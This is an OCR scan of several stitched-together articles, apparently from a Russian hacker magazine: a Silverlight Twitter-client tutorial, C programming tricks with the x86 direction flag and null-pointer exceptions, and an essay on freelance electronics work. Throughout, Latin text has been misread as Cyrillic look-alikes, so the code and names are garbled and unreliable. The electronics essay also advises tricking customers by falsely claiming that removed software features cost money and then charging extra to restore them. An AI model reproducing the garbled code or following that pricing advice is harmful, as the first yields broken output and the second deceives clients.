изіпд (ШеЬСІіепС сІіепС = пем ШеЬСІіепС ( ) ) 

{ 

сІіепС . СгесіепСіаІз = пеъ? ЫеСілгогкСгесІепЦіаІ 
(изегЫаше, раззѵлэгсі) ; 

изіпд (ЗСгеат зСгеаш = сІіепС . ОрепКеасІ (игі ) ) 
{ 

изіпд (ЗСгеатКеасІег геасіег = 
пем ЗСгеатКеасІег (зСгеат) ) 

{ 

геіигп геасіег . КеасІТоЕпсІ ( ) ; 

} 

} 

} 



} 



Следующий важный момент— реализация механизма получения акту- 
ального тай мл ай на, через который мы будем следить за сообщениями. 
Технически это реализуется очень просто: 

риЫіс зігіпд СеСРиЫісТішеІіпе ( 

ОиСриСЕогшаСТуре ТогшаС) 



{ 



зігіпд игі = зСгіпд . ЕогтаС (ТміССегВазеІІгІРогтаЦ , 
СеСОЬзесСТуреЗСгіпд (ОЬдесСТуре . ЗСаСизез) , 
СеСАсСіопТуреЗСгіпд (АсСіопТуре . РиЫіс_Тіше1іпе) 
СеСРогшаСТуреЗСгіпд ( ТогшаС ) ) ; 
геЕигп ЕхесиСеСеССоштапсі (игі , пиіі, пиіі); 



} 



Кое-что 
о безопасности 



Основу безопасности платформы составляет принцип запуска 
ЗіІѵегІі^ІЛ-приложений в «песочнице» веб-браузера. При этом 
границы дозволенного очерчены заранее, и разработчики прило- 
жений не могут их расширить. Для хранения пользовательских 
данных используется технология Ьосаі зіюга^е (аналог соокіез) . 
Элемент платформы РіІеОреп біа1о§ позволяет организовать 
безопасное взаимодействие на уровне файловой системы. Реали- 
зована также поддержка сокетов файлов роіісу. 



► 102 
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ЗІІѵегІідЫ-приложение 



Обрати внимание, что я сделал метод параметризированным. 
Нужно это для того, чтобы иметь возможность представить 
полученные данные в форматах 450ІЧ, ХМІ_, Н55 или АТОМ. 
Саможе преобразование осуществляется через объект 
ОиѣриІРогтаІТуре. Например, ОиІриІРогтаІТуре . ХМЬ 
или ОиІриІРогтаІТуре .РЗОШ— и так далее. 

Аналогично реализуется и метод СеѣІІзегТішеІіпе () стой 
лишь разницей, что к ИРИ-запросу добавляются параметры, 
содержащие имя пользователя и пароль. 

Все остальные методы можешь найти в исходниках к статье. 
Теперь отом, какзаставить созданный АРІ работать. Прежде 
всего, нужна исходная информация о логине/пароле для 
доступа вТѵѵіиеги инфа о клиенте (это одно из требований 
официального АРІ). Можешь организовать работу с пере- 
численными выше параметрамитак, кактебеудобно. Яже в 
своем примере, сильно себя неутруждая, создал под них файл 
ресурсов. 

Имея на руках реализацию АРІ собственного производства и 
файл с необходимыми ресурсами, можно создавать Тѵѵіііег- 
клиент. Какя уже упоминал выше, лучше выполнитьего в виде 
отдельного класса. Сначала проинициализируем экземпляр 
АРІ-движка: 

зРаРіс ТѴіЬЬег4Уои ( ) 



Ехргеввіоп ВІепсІ 2 — продвинутые средства редактирования 



зЬгіпд хтІКезиІЬ = ТтЬСегАрі , 8Ь.сж ( 
Тѵ\тЬЬегКезоигсез . БзегБате , 
Тѵ\тЬЬегКезоигсез . Раззтлгогсі, 
изегБате , 

Т4БАрр . ТміЬЬег . ОиЬриЪРогтаЬТуре . ХМЬ) ; 

ХБосшпепЬ хБос = 

ХБоситепЬ . Рагзе (хтІКезиШ ) ; 

теззаде = ""X м " + хБос . ЕІетепЬ ( "изег " ) 

. БезсепсІапЬз (ХБате.СеЬ ( " ЬехЬ" ) ) . 
РігзЬ ( ) . Ѵаіие + 

" \ " \г\п — " + изегБате; 

} 

саЬсЪ. (ЕхсерЬіоп апуЕхсерЬіоп) 

{ 

теззаде = апуЕхсерЬіоп.Меззаде; 

} 



> сіѵсі 

• Мы не нарушаем 
нашихтрадиций — на 
диске рабочий исход- 
ник проги. Можешь 
использовать его по 
своему усмотрению. 




> Ипкз 

• Описание архитекту- 
ры ТѵѵіМег: 
ѵѵѵѵѵѵ.іпвідЫі-іЬги/ 
пеі/всаІаЬІІІІу/ 
агкЫіекІигаБѵѵіиег/ 

• Документация на 
ТѵѵіМег АРІ: 
дгоирв.доодіе. 
сот/д гоирЛѵѵіБег- 
сІеѵеІортепЫаІк/ѵѵеЬ/ 
арі-боситепіабоп 



{ 

ТѴіЬЬегАрі = п еѵг Т4БАрр . ТѴіЫсег ( ) ; 
ТѴіЬЬегАрі . ТъМЪЬегСІіепЬ = 

РѴіЬЬегКезоигсез . РѴіЬЬегСІіепЬ ; 
Тѵ/іЬЬегАрі .ТміЬЬегСІіепШгІ = 

РѴіЬЬегКезоигсез . ТхѵіЫсегСІіепЬБгІ ; 
ТѴіЬЬегАрі . ТътЬЬегСІіепЬѴегзіоп = 

Тѵ^іЬЬегКезоигсез . Тѵ^іЬЬегСІіепЬѴегзіоп; 
Тѵ^іЬЬегАрі . Зоигсе = 

РѴіЬЬегКезоигсез . РѴіЬЬегСІіепЬ ; 

} 

После чего можно отправлять запрос: 



геЬигп теззаде; 

} 

Здесь мы получаем сообщение вХМІ_-формате и с помощью 
ХОосиппепІ разбираем его на отдельные элементы. Нас инте- 
ресуеттолько один ХМ 0-узел : «изег» (а точнее, содержащий- 
ся в нем узел нижнего уровня «СехС», в котором и хранится 
запись пользователя). 

Созданная ранее сладкая парочка из двух классов на С# в 
принципе может стать самодостаточным приложением ил и же 
войти в состав другого, более сложного, приложения. Давай 
разберемся, какзаставить сконструированные объекты рабо- 
тать в ЗІІѵегІідЫ-окружении. 



• Сообщество 

ЗіІѵегІідЫ:: 

віІѵегІідЬЬпеІ: 

•Официальный сайт 
технологии: 
ѵѵѵѵѵѵ.пп іеговой, сот/ 
віІѵегІідЫ: 



риЫіс зЬаЬіс зЬгіпд СеЬЬаЬезЬТѴееЬ ( 
зЬгіпд изегБате) 

{ 

зСгіпд теззаде = пиіі; 

Ьгу 



ЙТѴѴІТТЕК + А5Р .МЕТ + БИУЕКИСНТ 

Последний штрих — привинтить ЗіІѵегІідЫ;- интерфейс ктолько 
что созданному Тѵѵіііе г- ридеру. Существует несколько спосо- 
бов. Рассмотрим наиболее популярный, в котором в качестве 
клея используется А5Р. 
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► юз 






Мигрируем в родной и близкий сердцу ѴізиаІ 



Создание нового проекта 



Добавляй в проектазрх-файл и открывай его в редакторе кода. Сейчас мы 
его немного подправим. 

В первую очередь нужно позаботиться отом, чтобы при загрузке страницы 
в окне браузера отображались самые свежие записи. Для этого добавляем 
простенький скрипт: 

<зсгірЕ гшіаЕ= " зегѵег " > 

[ЗузЕет.ШеЪ. Зегѵісез УОДеЪМеЕЬосІ] 

риЫіс зЕаЕіс зЕгіпд ОеЕЬаЕезЕТѵѵееЦ ( зЕгіпд изегБате) 

{ 

геЕигп ТѴіЕЕег4Уои . СеЕЦаЦезЕТмееЕ (изегЫаше) ; 

} 

</зсгірЕ> 

В моментзагрузки страницы мы будем получать самую актуальную информа- 
цию с ТѵѵіНег’а. Аэто значит, что после загрузки браузером секции <Ьеа<±> в 
принципе уже можно инициализировать скрипты, запускающие ЗІІѵегІідЫ- 
приложение. Напомню, что за реализацию этой важной функции отвечает 
скрипт Зііѵегіідіпѣ . 35. Ему-то мы и должны передатьуправление! 

<азр : ЗсгірЕМападег ІБ=" ЗМ1 " 

ЕпаЫеРадеМеЕЬодв= п Егие" гипаЕ= " зегѵег"> 

<ЗсгірЕз> 

<азр : ЗсгірЕКеЕегепсе РаЕІі= 

" -/ЗіІѵегІідЬД . з з " /> 

</ЗсгірЕз> 

</азр : ЗсгірЕМападег> 

Все готово. Теперьу нас есть проинициализированный ЗІІѵегІідЫ-объект. 
Можно им немного порулить — например, создать массив пользователей сис- 
темы, чьи сообщения тебе хотелось бы читать, не отрываясь оттекущих дел: 

ѵаг ЕѵЫЕЕегзТоТгаск = пей Аггау ( "тесіѵесі" , "кіаЕету" , 
"ЪаЪЫе" ) 

Читаем последние записи: 

ЕипсЕіоп опЬоасіед (зепйег , агдз) { 

РадеМеЕкосІз . СеЕЬаЕезЕТѴееЕ 

(ЕѵЫЕЕегзТоТгаск [ 0 ] , опЗиссеззСеЕЬаЕезЕТѴееЕ) ; 

} 

Если получение да иных за верш ил ось успешно, передаем их в ЗІІѵегІідЫ- 
контрол для рендеринга и отображения в окне браузера: 

ЕипсЕіоп опЗиссеззСеЕЬаЕезЕТѵлэеЕ (гезиІЕ) { 
ѵаг ЕѵЫЕЕегТехЕ = 



ріидіп . сопЕепЕ . ЕіпсіЫате ( " Еѵ/іЕЕегТехЕ " ) ; 

ЕѵЫЕЕегТехЕ . ТехЕ = гезиІЕ; 

} 

Если ты посмотришь в исходники, то обнаружишь в этом месте еще не- 
сколько строк, отвечающих за анимацию текста. Поскольку размеры статьи 
ограничены, эта, не самая важная, часть приложения осталасьза кадром. 
Ктомуже, перед тобой набор достаточно простых и очевидных функций, и 
изучив исходники, ты обязательно разберешься, что кчему. 

Отдельно хотелось бы остановиться на том, как в йОМ-структуру добавить 
объект, соответствующий ЗіІѵегІідЫ-приложению. 

<йіѵ іс1= " зіІѵегІідІіЕРІидІпНозЕ " > 

<зсгірЕ Еуре= " ЕехЕ/ заѵазсгірЕ " > 

ЗіІѵегІідЬЕ . сгеаЕеОЕд есЕЕх ( { 
зоигсе: 1 ТхѵіЕЕегЗсепе . хагпі 1 , 
рагепЕЕІетепЕ : зіІѵегІідкЕРІидІпНозЕ , 
ісі: ' зіІѵегІідкЕРІидІп 1 , 
ргорегЕіез: { 
ѵЫсІЕЪ. : ' 1 0 0 % ' , 
кеідЬЕ : ' 100% 1 , 

Ъаскдгоипсі: 1 ѵ/МЕе' , 
ѵегзіоп : '1.0' 

} , 

еѵепЕз: { 

опЬоасІ: пиіі 
сопЕехЕ : пиіі 
}) ; 

</зсгірЕ> 

</с!іѵ> 

Значит та к. Из всей этой кучи нам надо запомнить только несколько 
ключевых моментов. Для работы с ЗіІѵегІідЫ нужно через системное 
окружение браузера, в котором присутствует объект ЗіІѵегІідЫ;, вызвать 
метод сгеаѣеОЪзесѣ () или сгеаѣеОЫесѣЕхО . Если есть желание 
разобраться, в чем разница между этими двумя методами — кури М50КІ. 
Когда вызываешь метод, не забудь скормить ему следующие пара- 
метры: зоигсе (ссылка на ХАМИ-файл ),рагеп1Е1етеп1 (йОМ -объект, 
которому посчастливилось стать ЗІІѵегІідЫ-контейнером) и ргорегііез 
(массив параметров, описывающий характеристики ЗіІѵегІідЫ-объекта, 
например, его размеры). 

В принципе, это все, что я хотел тебе сегодня рассказать, учитывая скром- 
ный объем журнальной статьи. Ковыряйся в исходниках и документации, 
разбирайся, что кчему, и возможно, ты присоединишься крастущей армии 
разработчиков ЗіІѵегІідЫ. Ищи свой путь. Главное — не стоять на месте. 
«Эволюция или забвение» — пускай эти слова станут одним изтвоих 
девизов. ПС 
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Высококачественный продукт. На содержит: мыльных опер 
консервированнаго юмора, концентрированного гламура, 
бандитских ценностей, гевномодифициропаннык новостей. 
Тестируете» на 10 млк. человек в Москве и Питере, 
Побочные эффекты: 



КАЧЕСТВО 





Си — самый низкоуровневый из всех высокоуровневых языков, идеологически близкий к 
ассемблеру. Настолько близкий, что способен позаимствовать чисто ассемблерные фичи, 
существенно упрощающие решение многихзадач и реализуемые без использования ас- 
семблерных вставок. Да -да, средствами самого языка. 



Реверс строки в адресном континууме| 



[Перевернуть строку, не используя дополнительной памяти, — до- 
распространенное задание для юниоров, нацеленное на знание 
указателей. Когда же его дают матерым программистам, над «экзаменатором» 
не грех и постебаться, воскликнув: «Азачем ее разворачивать? она и такуже 
развернута!». После чего пояснить: «В мире все относительно: где конецтого 
начала, что есть начало конца?!». Каки многие другие, х86-процессоры под- 
держивают флагнаправления: просто взводим его, перемещаем указатель 
на конецстроки и движемся в обратном направлении. Некоторые проблемы 
создает отсутствие завершающего нуля на конце (точнее, в начале) строки, но 
что мешает нам запомнить ее длину? В адресном пространстве нет понятия 
«верха» и «низа». До сих пор не утихают споры: куда растет стек и адреса 
памяти. А потому, всякая последовательность байт одновременно существует 
в двух состояниях — прямом и развернутом. 

Увы, при всей красоте этой концепции ее не объяснишьбиблиотечным функ- 
циям. В частности, Еореп,ргіпЕі,МеззадеВох)л др. — движутся отмлад- 
шихадресов кстаршим. Без полноценного реверсатутникакнеобойтись, но 
мы можем воспользоваться этим «подарком» в своих собственных функциях, 
передавая им в качестве аргумента флаг, в каком направлении двигаться 
— увел ич и вать указатель или уменьшать его. 

Кто-то может презрительно хмыкнуть: флагнаправления и в чистом ассем- 
блере редко используется, а уж на языках высокого уровня ему и вовсе не 



01 



вольно 



место, разве что — вакадемическихзадачках. Но зачастую массив элементов, 
отсортированный по возрастанию, требуется превратить в массив, отсорти- 
рованный по убыванию. Реверс элементов с перемещением их по памяти 
— не самая быстрая операция, особенно если этих элементов у нас много, 
а переупорядочивать их приходится достаточно часто. Флаг направления 
в этом случае экономит кучу процессорныхтактов ценой незначительного 
усложнения алгоритма. 

Единственный недостаток предложенного способа — падение произво- 
дительности при движении взад: от старших адресов кмладшим. Такуж 
повелось, что вся подсистема памяти от кэш-контроллера первого уровня 
до БРАМ-модулей ориентирована на чтение вперед, иначе она начинает 
тормозить, облагая нас«штрафными»тактами. Апотому многократное чтение 
массива в обратном направлении (особенно большого массива) — это не 
Ееп-ѵѵау. Лучше затратить время на однократный «честный» реверс, а потом 
читать вперед, сколько влезет. Хотя реверс плюс однократное чтение массива 
в прямом направлении — намного медленнее однократного чтения того же 
массива вобратном направлении. 



к Принудительная проверка успешности операции 



"Ассеблерщикам хорошо! В их распоряжении есть флаги процессора, 
сплошь и рядом используемые для индикации ошибоквыполнения функций. 
Авотна Си, если функция возвращает ілС (а возвращаетона его преда- 
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тельски часто), — в качестве индикатора успешности выполнения операции 
приходится использоватьзначение, не входящее в диапазон «валидных» от- 
ветов. Применительно к таііос, — это ноль (нулевой указатель не может быть 
валидным, во всяком случае, в Си). Если же ноль входит в область допустимых 
значений, приходится возвращать -1 или выкручиваться как-то еще. 
Какследствие, мы имеем полный разброд без всяких признаков стандар- 
тизации. Попробуй удержи в голове все эти подробности! Неудивительно, 
что многие программисты «забывают» о проверке, передавая возвращен- 
ные (некорректные) значения другой функции. В результате, программа 
падает или ведет себя некорректно, но даже если и падает, то совсем не 
в месте ошибки, а довольно далеко от него. Положение осложняется тем, 
что проекты зачастую пишутся кучей людей, среди которых попадаются 
откровенные «вредители», не выполняющие никаких проверок вообще. 
«Аукается» это в чужих модулях, высаживая коллег на измену. 

Как гарантированнозаставить«пионеров» выполнять проверки или хотя 
бы добиться того, чтобы программа стабильно грохалась именно втом 
месте, где возни кает ошибка? Достаточно вместо значения возвращать 
указатель на память, гдеэтозначениележит— или ноль (при ошибке). 
Обращение к нулевому указателю приводит к немедленному выбросу 
исключения, за которое «пионеру» легко надавать поушам. 

Конечно, при этом возникает «лишняя» операция обращения к памяти, но 
это не проблема, поскольку в общем зачете накладные расходы стремятся 
к нулю. Даже если функция целиком состоит из одного геіигп и прини- 
мает параметры через регистры по базиса [[-соглашению, она все равно 
заталкивает адрес возврата на стек, обращаясь к памяти... 50% «оверхид» 
на пустой функции — нетакой уж плохой результат! Проблема втом, что 
найти место для размещения возвращаемых данных нетак-то просто. Если 
выделять блок при помощи лъаііос, то это, во-первых, слишком медленно, 
а во-вторых, когда «пионер» забудет освободить возращенный указатель 
(а он забудет), память потечет рекой. 

А что если возвращать указатель на статическую переменную? Это снимает 
проблемы с освобождением памяти, но функция становится нереентерабель- 
ной. Иногда это можнообойти использованием локальной памяти потока, но 
локальная память потока бессильна против рекурсивных вызовов функции. 
Рекурсия встречается нетакужи часто, поэтому способ имеет право на 
существование. 

Точнотакже, если функция возвращает данные поуказателю, мы можем 
«навязать» проверкууспешности выполнения операции путем возвращения 
указателя на указатель (возвращая в случае ошибки ноль). 

'ШП ПЖБ 

^Вовремена М5-005 большинство системных функций вызыва- 
лись путем генерации программного прерывания командой ШТ 21Ь. 
ІЛЧІХ-системы используют этот путь и сегодня (только вместо вектора 21Ь 
у них 8 ОЬ). Достоинство подхода втом, что код, вызывающий ІІ\ІТ, не име- 
ет ни малейшего представления отом, по какому адресу находится сис- 
темный обработчик. Более того, этотадрес можетдинамически меняться 
(например, в М5-Б05 появился новый резидентный вирус, хе-хе). 
ѴѴІпсіоѵѵб ЫТ в плоть до ХР также использовала ШТ в качестве «моста» между 



ивег-іапсі и кегпеі-іапсі, позволяя прикладному коду делать системные вызовы. 
Начиная сХР, медленная команда ІІ\ІТ смен илась более быстрой 8У8ШТЕЯ/ 
5У5САЬЬ(1п*е1/АМБ, соответственно), однако на прикладном уровне основным 
средством межмодульных вызовов стал экспорт/импортэффективных адре- 
сов. Именно так и работа ют динамические библиотеки. 

Экспорт/импорт прекрасно действует в рамках одной программы, но когда 
мы пытаемся прикрутить к ней поддержку ріид-іп’ов, возникает куча проблем. 
Фактически, основная программа, сточкизрения ріад-іп'а, превращается в 
операционную систему и необходимо как-то передать адреса всех функций, 
чтобы ріид-іп их мог вызывать. Обычно для этого используется готовый меха- 
низм, и ріид-іп’ы реализуются какдинамические библиотеки. Это накладывает 
на разработчика программы множество ограничений, призванных обеспечить 
обратную совместимость. Но это еще что! Отсутствует возможность (легальная) 
написания ріид-іп'ов-фильтров, встраивающихся между уже загруженным 
ріид-іп’ом и основной программой. 

Тут как нельзя кстати оказался бы ІІ\ІТ, но, во-первых, это системно-зависимо 
и абсолютно непереносимо, а, во-вторых, вызывать ІІ\ІТ с прикладного уровня 
для передачиуправления на прикладнойуровень — негуманно. Вотнамного 
более элегантный способ: основная программа устанавливаетобработчик 
исключений, а ріид-іп для вызова функций программы производит запись 
определенной структуры данных по нулевому указателю, что ведет к генерации 
исключения, перехватываемого (и обрабатываемого) основной программой. 
Программа можетдинамически переназначатьобработчики исключения в 
зависимости оттекущего режима работы (например, запуске встроенного 
редактора), то же самое могут делать и ріид-іп’ы. Устанавливая свой обработ- 
чикисключения, перекрывающий предыдущий, они перехватываютобщение 
основной программы со всей цепочкой ріид-іп’ов-фильтров. Ну разве не 
красота? 

Скажу несколько слов о структуре, записываемой по нулевому указателю. Ко- 
личество возможных решений намного больше одного (все зависит от вкусов 
программиста ), нообщий принциптаков: 

«Магическая»таблица, записываемая по нулевому адресу 

зСгисС ІеЬеп 
{ 

сйаг гпадіс [ ] = "Ы2М1 " ; 

// магический «пирожок» 
іпС зузса11_ісІ; 

// номер «системного вызова» 
ѵоісі *1ізО; 

// указатель на список аргументов «сис . вызова» 

Поясню:льэдіс — хранит магическое слово, проверяемое обработчиком 
исключения, чтобы удостовериться, что это неслучайная операция записи, а 
преднамеренный «системный вызов», номер которого хранится в зузса11_ 
ій. Впрочем, вместо номера можно использовать имена «системных вызовов» 
— на усмотрение программиста. Аргументы передаются (и возвращаются) 
через указатель на область памяти (в данном случае *1ізі), формат которой 
варьируется от одного «системного вызова» к другому. НС 
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БАБЛО 



С ПАЯЛЬНИК 



Втыкая с утра до вечера в даташиты, разрабатывая и изготавливая новые блоки 



^ ^ 

и девайсы, вскоре начинаешь понимать, что становишься редким в наше время 

* 'АВОШяЯ&т' * ж ~ ***” 

спецом — электронщиком. А значит, умеешь делать то, что не умеет большинс- 
тво. Отличный повод начать зарабатывать! ^ 



Н КАКЯ ДОКАТИЛСЯ ДО ЖИЗНИ ТАКОЙ 

Когда-то я работал инженером-наладчиком, ремонтировал и настраивал 
громадные станки с программным управлением и неплохо, по меркам 
моего города, зарабатывал. Однако вскоре мне надоели эти мазутные 
железки, осточертело мотаться по разным предприятиям — и я решил 
уйти в фирму, занимающуюся разработкой и изготовлением лабораторной 
электроники. Но через три месяца понял, что итутловить нечего — в кон- 
торе царил закоренелый консерватизм и отсутствие малейшего желания 
что-либо менять. Мне оставалось настраивать готовую продукцию, а также 
откачивать и ремонтировать «трупы». А я хотел творчества и самостоя- 
тельных разработок. 

Спасение явилось оттуда, откуда никто неждал: пришли ставить домаш- 
нюю сигнализацию, и я краем глаза увидел внутренности одного из их 



блоков. Лажа оказалась редкостная — сплошные сопли, кривая пайка и 
убогий монтаж. Сразу смекнув, что это голимый самопал, а значит — я могу 
перебить заказ на изготовление, я подозвал одного из техников и показал 
ему печатную плату собственного изготовления с идеальными, словно 
фабричными, дорожками и отличной пайкой. Мужик подивился и сказал, 
что передаст начальству, что нашли классного монтажника. Так я получил 
первого заказчика. Дальше было веселей! На заказ я тратил не более 
десяти-пятнадцати часов в месяц, но доход от производства сигнальных 
блоков вскоре начал перевешивать мою официальную зарплату. Все 
же, уходить в свободное плавание было боязно, но тут обстоятельства 
сыграли мне на руку. На работе начались косяки с начальством. Дирек- 
тор покатил на меня бочку: дескать, я не справляюсь с обязанностями. 
Вместо объяснительной я положил ему на стол заявление об увольнении. 
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Когда я увидел, что они используют ЭТО, я понял - они нужда ются во мне! 



Мой первый серийный девайс - компонентсигнализации. Кормит меня уже 
почти год 



Итогом стало то, что вотуже почти год я тружусь исключительно на себя. 
Совершенно не напрягаясь, работаю по два три дня в месяц и живу вполне 
припеваючи! 

Но это была присказка, а сказка — впереди. О некоторых тон костях работы 
в сфере производства и разработки электроники я и хочутебе сейчас 
поведать. 

Н ЗНАЙ И УМЕЙ 

Чтобы начатьзарабатывать на электронике, ее надо научиться проекти- 
ровать и изготавливать. На самом деле, не все так страшно. Современ- 
ный уровень электрон и кита кой, что разработка какого-либо устройства 
больше напоминает игру в конструктор. Куча стандартизованных деталей, 
общающихся между собой на стандартныхже протоколах! Особенно ярко 
это выражено в цифровой электронике. Такчто, изучай материальную 
часть, вкуривай в протоколы, разбирай принципы работы и всеутебя 
получится. Учиться, учиться и еще разучиться. И вскореты сам поймешь, 
что разработать что-либо прикольное — не проблема. Также нужно вкурить 
в производство печатных плат в домашнихусловиях. ЛУТом или фоторе- 
зистом — неважно, главное, чтобы ты мог быстро создать прототип или 
опытную партию. 

Н НАЙДИ СВОЮ НИШУ 

При комбинации слов «фрикинг» и «бабло» сразуже всплывает в голове 
этакий образ маньячного криминального таланта, грозно сверкающего 
глазами в клубах канифольного дыма и выдающего десятки жучков, радио- 
закладок и боксов всех цветов радуги. В целом, все верно. Криминальный 
фри к — это очень прибыльный бизнес. За простейший жучок можно взять 
под пару сотен баксов, не напрягаясь (а за более сложный девайс вроде 
скимера для банкомата или хакнутого РОБ-терминала — десятки тысяч 
баксов). И это — при копеечных вложениях в материалы и трудозатраты 
на изготовления. Но легкая жизньдорого стоит— нарваться тоже можно 
по-крупному. В лучшем случае, если на тебя выйдут местные органы 
правопорядка, ты или огребешь срок, или (при очень большом везении) от- 
делаешься легким испугом, загремев в застенки ФСБ. Занимаясь черным 
фриком, ты постоянно рискуешь быть кинутым на бабки, так как куда проще 
отобрать девайс и незаплатитьза него, все равноты не пойдешь никуда 



жаловаться. При наихудшем же раскладе на тебя подсядет крутая братва 
и, применив свои весьма негуманные методы, склонит к сотрудничеству. 
Воттогда придется до конца дней своих клепать задарма разного рода де- 
вайсы. Отвязаться от них будеточень и очень сложно, разве что пойдешь с 
повинной в органы и всех заложишь. Однако системы защиты свидетелей 
в нашей стране я что-то не наблюдаю, такчто Стиратель за тобой с рейлга- 
ном не придет — сам будешь выкручиваться. Короче, не рекомендую я тебе 
лезть в эту грязь. Делать девайсы для саморазвития и экспериментов это 
одно, а вот продавать их или использовать по прямому назначению — уже 
конкретное преступление, за которое светит реальный срок. 

Короче, наш выбор — мирный атом, холодный термояд и законный фрик, 
в широких кругах именуемый радиоэлектроникой. Итак, чемже можно 
заняться в этой сфере? Ремонтом сотовых и прочей бытовой электроники? 
Отбросьэту мысль сразуже! Суди сам, средняя цена мобилы — пятьтысяч 
рублей, а то и дешевле. За ремонт ты в принципе не сможешь взять больше 
стоимости девайса, а возни дофига, плюсуйдет куча времени, пока ты вку- 
ришь, что там да как. Куда перспективней выглядит ремонт промышленной 
техники. Это тебе не китайский ширпотреб, средняя стоимость частотно- 
го преобразователя может достигать нескольких сотен тысяч рублей, а 
диагностировать и чинить из зачастую гораздо проще, чем сотовые, так как 
вы шибает там, в основном, ключи и прочие силовые блоки. Но на промыш- 
ленный рынок и выйти сложней. Надо тусоваться по заводам и прослыть 
неплохим спецом — отличное задание для производственной практики 
студентов техников. К то му же, тут надо работать, работать постоянно, а 
настоящий гик умен и ленив и вкалывать, как папа Карло, ему за падл о. 
Остается собственное производство и разработка. Самая востребованная 
ниша — это мелкая автоматика. 

С одной стороны, существуетуйма готовых решений на все случаи жизни. 

С другой стороны, стоятони весьма дорого и их еще надо найти. 

г хождения горы и Магомета 

Если ты разработал и изготовил мега-девайс, то, вероятно, сможешь его 
выгодно продать. Но этот путь чреваттем, что крутизну сего девайса оце- 
ниваешьтолькоты, а остальным он и не нужен вовсе. Умение продавать 
— это искусство и не всякий им владеет в совершенстве. 

Поэтому для начала, ІМНО, лучше танцевать отзаказчика. Есть заказчик 
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Инструмента я использую минимум - паяльная станция, осциллограф, 
сверлилка да мелочевка всякая 



— делаем, нетзаказчика — ищем. Где искать заказчиков? Тут множес- 
тво вариантов. Надо просто обращать внимание на то, что происходит 
вокруг, и не скромничать. Как я уже говорил, первый крупный заказчик 
пришел ко мне сам. Я лишьуглядел, что ему мои услуги понадобятся. 
Другой встретился на улице — мужик обсуждал по телефону автоматику, 
которую он бы хотел видеть в своей мастерской; когда он положил трубку, 
я вежливо уточнил суть проблемы. Несколько заказов было по наводке с 
предприятий, где я раньше работал. Ну и, например, можно обратиться 
к какой-либо охранной фирме и поинтересоваться, что бы они хотели 
реализовать. Наверняка, у них возникали технические проблемы, которые 
они не в состоянии решить своими силами. Многие сисадмины хотели бы 
иметьу себя в серверной какую-нибудь «автоматическую хрень», но не 
хватаетзнаний в области электроники. В общем, пораскинь мозгами и не 
бойся напроситься. Искать заказчика — это какдевчонок на улице клеить: 
в худшем случае откажут, но, очень вероятно, обрадуются, и ты получишь 
свой первый заказ. 

Ну и, главное, ты должен сам чувствоватьуверенность в своихсилах. На- 
пример, когда меня спрашивают, смогули я решить ту или иную задачу, то 




Стандартное любительское ТЗ. Втаком виде обычно и приходит от 
заказчика 

после уточнения всех деталей либо у меня в голове мгновенно возникает 
примерный образ готового устройства с полным пониманием основно- 
го принципа работы, и я соглашаюсь, либо, если сходу не догоняю, как 
это сделать — отказываюсь. Нет ничего хуже, чем взяться за проект и, 
затупив, броситьего на полпути. При этомты теряешь и свое время и, 
что гораздо хуже, время своего заказчика. Время, как известно, деньги. 
Зачастую совсем немалые. Поэтому, не знаешь как — отказывайся. 

0 НЕ ПРОДЕШЕВИТЬ 

Любой заказчик первым же делом захочет узнать цену вопроса. Это очень 
тонкий момент, тут главное — не продешевить и не зажлобить. Чтобы не 
продешевить, нужно сразу же прикидывать примерную конструкцию бу- 
дущего устройства, сколько примерно будет стоить основная комплектуха 
(контроллер, корпус, обвязка и внешние элементы), во сколько обойдется 
сборка и прочее. Для этого надо быть в курсе всех цен на детали, хотя бы 
ориентировочно. Прикинул, сосчитал? Теперь умножь на два, чтобы за- 
щитить себя от кучи непредвиденных расходов, которые могут вылезти в 
ходе разработки. Полученное число — это себестоимость, ниже нее работа 
будетсебе в убыток. Дальше добавляешьсвой навар (сколько ты хочешь 
поиметь с разработки), и воттут начинается самое интересное — опреде- 
ление ценовой ниши. 

Надо понять важность задачи, наличие возможных конкурентов и целевое 
назначениеустройства. Поясню на примере. Как-то обратился ко мне 
один из бывших работодателей. У него сгорела клава на лазерном резаке 
Вузіхопіс. Лазер стоит почти миллион евро, и каждый день простоя 
влетает коммерсанту в неслабую копеечку. Заказывать новую клавиатуру, 
во-первых, дорого (пару килобаксов она стоитточно), а, во-вторых, очень 
долго. Можно было содрать с него три шкуры, нотутбыл ряд осложня- 
ющих факторов. Само устройство получалось простое, кактри копейки, 

— контроллер да преобразовательуровня, и заказчикэто знал, так как 
круто шарит в электронике. И хоть самому ему паять некогда, он наверня- 
ка имеет на примете других электронщиков, которые ему тоже могут все 
сделать. В итоге, прикинув такой расклад, я выставил цену примерно в 
пятьсот баксов — столько бы взял за разработку хороший электронщик. 
Ударили по рукам, и через несколько дней девайс был готов. По деталям 
он вышел рублей в пятьдесят (ну и вечер на написание простенькой 
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прошивки). За разовые заказы можно брать много, так как в их стоимость 
включается еще и разработка, а это — интеллектуальный труд, да еще и с 
редкой спецификой. 

Если же заказчик хочет много экземпляров, то тут ломить многие тысячи 
неразумно — потеряешь клиента. Здесь надоучитыватьспецифику 
применения. Опять же, приведу пример. Заказали мне измеритель уровня 
фекалий в септик баке, тираж обещается быть неслабым. Себестоимость 
девайса вышла рублей втриста, само устройство — элементарное (опять 
контроллер и немножко обвязки). Сколько запросить? Я попросил день на 
обсчет стоимости прототипа и изготовления, а сам полез в инет проша- 
риваться насчет септи к- канализации. Оказалось, стоимость этой бочки 
зашкаливаетза два-три килобакса. Соответственно, на ее фоне лишняя 
тысяча за весьма удобную опцию даже не отсвечивает. Решил нежлобить 
и установил цену в штуку рублей. И заказчик остался доволен, и я не в 
накладе. На разработку девайса ушло не больше суток — сюда вошло 
и написание прошивки, и разработка печатной платы, и изготовление 
прототипа. 

Если же заказчик кривится и жалуется, что дороговато выходит, то следует 
делать морду кирпичом, сочувствовать и предлагать ужать немного за 
счет пары функций. Пофиг, что функции все программные и на стоимость 
не влияют, главное, начать диалог и выторговать пусть чуть более низкую 
цену, но не потерять заказчика. Функции, ранее убранные, можно потом 
добавить, сказав, что это было сделано нечеловеческими усилиями, и 
выбить из заказчика разовую премию. 

Если партия обещает быть очень крупной, от пяти сотен штук, то тут 
жлобить нельзя нив коем случае. На такую партию найдется и Китай, и де- 
велоперы из крупных контор, где все поставлено на поток, а потому очень 
дешево. Очень! Тут просто: высчитывай максимально возможную себес- 
тоимость с учетом изготовления третьей стороной. Накидывай небольшой 
навар, разрабатывай — и отправляй делатьтретьей стороне. Таким обра- 
зом, ты и палецо палец неударишь, нозато получишь небольшой процент 
